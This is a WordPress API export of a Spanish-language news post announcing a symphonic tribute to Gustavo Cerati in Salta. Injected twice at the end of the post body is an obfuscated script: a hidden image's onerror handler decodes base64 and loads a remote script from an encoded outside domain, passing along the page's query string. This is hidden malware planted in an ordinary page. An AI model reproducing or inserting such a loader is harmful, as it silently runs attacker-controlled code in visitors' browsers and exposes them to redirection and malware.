{"id":2612,"date":"2023-05-08T11:37:35","date_gmt":"2023-05-08T14:37:35","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2612"},"modified":"2025-08-14T00:17:20","modified_gmt":"2025-08-14T03:17:20","slug":"el-homenaje-sinfonico-a-gustavo-cerati-llega-manana-al-teatro-provincial","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2612","title":{"rendered":"El homenaje sinf\u00f3nico a Gustavo Cerati llega ma\u00f1ana al Teatro Provincial"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#950559\"><em>La Camerata Stradivari presentar\u00e1 \u201cGracias Totales\u201d \u00a0un concierto sinf\u00f3nico imperdible para homenajear al ex l\u00edder de Soda Stereo. Las entradas disponibles en boleter\u00eda.<\/em><\/h3>\n\n\n\n<p>Luego del \u00e9xito en la presentaci\u00f3n de fines del 2022, Camerata Stradivari ofrecer\u00e1 nuevamente \u201cGracias totales, homenaje Sinf\u00f3nico a Gustavo Cerati\u201d, ma\u00f1ana martes 9 de mayo a las 21 en el Teatro Provincial (Zuviria 70).<\/p>\n\n\n\n<p>Bajo la direcci\u00f3n de la Maestra Inga Iordanishvilli, se podr\u00e1 disfrutar de un paseo emotivo por las canciones inmortales de Gustavo Cerati, con un gran respeto por las interpretaciones originales.<\/p>\n\n\n\n<p>En este encuentro, se destacar\u00e1 la voz de Mauro S\u00e1enz, que fue ovacionado en el estreno. &nbsp;El concierto contar\u00e1 con m\u00e1s de 40 m\u00fasicos en escena y cantantes invitados.<\/p>\n\n\n\n<p>\u00abFundaci\u00f3n Camerata Stradivari\u00bb, bajo la direcci\u00f3n de la Maestra Inga Iordanishvili, es un proyecto inclusivo e integrador que brinda formaci\u00f3n y perfeccionamiento en diversos instrumentos a trav\u00e9s de su Orquesta Sinf\u00f3nica, su Orquesta de c\u00e1mara y Coro.\u00bb<\/p>\n\n\n\n<p>Las entradas podes adquirirlas en SALTA TICKET\u00a0<a href=\"https:\/\/www.saltaticket.gob.ar\/espectaculo\/12484?h=292ff388267a03ac02ea6345266f6a9a8b23cc13\" target=\"_blank\" rel=\"noopener\" title=\"\">https:\/\/www.saltaticket.gob.ar\/espectaculo\/12484?h=292ff388267a03ac02ea6345266f6a9a8b23cc13<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/el-homenaje-sinfonico-a-gustavo-cerati-llega-maniana-al-teatro-provincial-89538\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La Camerata Stradivari presentar\u00e1 \u201cGracias Totales\u201d \u00a0un concierto sinf\u00f3nico imperdible para homenajear al ex l\u00edder de Soda Stereo. Las entradas disponibles en boleter\u00eda. Luego del \u00e9xito en la presentaci\u00f3n de fines del 2022, Camerata Stradivari ofrecer\u00e1 nuevamente \u201cGracias totales, homenaje Sinf\u00f3nico a Gustavo Cerati\u201d, ma\u00f1ana martes 9 de mayo a las 21 en el Teatro [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2613,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,26],"tags":[],"class_list":{"0":"post-2612","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2612"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2612"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2612\/revisions"}],"predecessor-version":[{"id":7090,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2612\/revisions\/7090"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2613"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2612"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2612"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2612"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}